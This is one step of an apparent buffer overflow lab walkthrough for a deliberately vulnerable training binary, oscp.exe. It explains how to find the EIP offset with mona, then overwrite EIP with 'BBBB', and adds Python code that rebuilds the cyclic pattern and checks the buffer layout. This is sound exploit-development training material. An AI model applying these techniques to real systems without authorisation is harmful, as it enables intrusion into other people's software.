# 4. Overwrite EIP

### EIP

We now use the offset to overwrite EIP with a value we control.

Copy the output of the pattern you created and place it into the `payload` variable of the `exploit.py` script.

On Windows, in Immunity Debugger, re-open **oscp.exe** again using the same method as before, and click the red play icon to get it running. You will have to do this prior to each time we run `exploit.py` (which we will run multiple times with incremental modifications).

On Kali, run the modified `exploit.py` script: `python exploit.py`

The script should crash the oscp.exe server again. This time, in Immunity Debugger, in the command input box at the bottom of the screen, run the following mona command, changing the distance to the same length as the pattern you created:

```
!mona findmsp -distance 600
```

Mona should display a log window with the output of the command. If not, click the "Window" menu and then "Log data" to view it (choose "CPU" to switch back to the standard view).

In this output you should see a line which states:

```
EIP contains normal pattern : ... (offset XXXX)
```

Update your `exploit.py` script and set the `offset` variable to this value (it was previously set to 0). Set the `payload` variable to an empty string again. Set the **`retn` variable to "BBBB"**.

Restart **oscp.exe** in Immunity and run the modified `exploit.py` script again. The EIP register should now be overwritten with the four B's (i.e. 42424242).
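As an added example (not the page's `exploit.py` and not mona), the following Python reproduces the two checks in this step locally: recovering the offset from the EIP value the cyclic pattern produced, and confirming that a buffer built from the `offset` and `retn` variables places "BBBB" in EIP. The `prefix` and `padding` parameters are assumptions about the `exploit.py` buffer layout.

```python
import string

# Added example: mirrors msf-pattern_create and the "(offset XXXX)" line of
# "!mona findmsp" so each value can be sanity-checked before the debugger run.

def pattern_create(length: int) -> bytes:
    """Cyclic pattern in the msf-pattern_create layout: Aa0Aa1Aa2...Zz9."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def pattern_offset(eip_hex: str, length: int) -> int:
    """Offset of the 4 pattern bytes now in EIP (hex as Immunity shows it).

    Returns -1 when the value is not part of the pattern, e.g. because EIP
    was not overwritten at all or the pattern was shorter than the offset."""
    needle = bytes.fromhex(eip_hex)[::-1]  # undo little-endian register order
    return pattern_create(length).find(needle)

def build_buffer(offset: int, retn: bytes, payload: bytes,
                 prefix: bytes = b"", padding: bytes = b"") -> bytes:
    """Layout of the exploit.py variables (prefix/padding assumed):
    prefix + 'A' * offset + retn + padding + payload."""
    return prefix + b"A" * offset + retn + padding + payload

def eip_value(buffer: bytes, prefix_len: int, offset: int) -> str:
    """Hex dword EIP would hold after the overwrite, e.g. '42424242'."""
    start = prefix_len + offset
    return buffer[start:start + 4][::-1].hex().upper()

if __name__ == "__main__":
    # Constructed value: what EIP shows if the 600-byte pattern lands at offset 100.
    eip = "64413364"
    off = pattern_offset(eip, 600)
    print("offset:", off)
    buf = build_buffer(off, b"BBBB", b"")
    print("EIP after retn overwrite:", eip_value(buf, 0, off))
```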
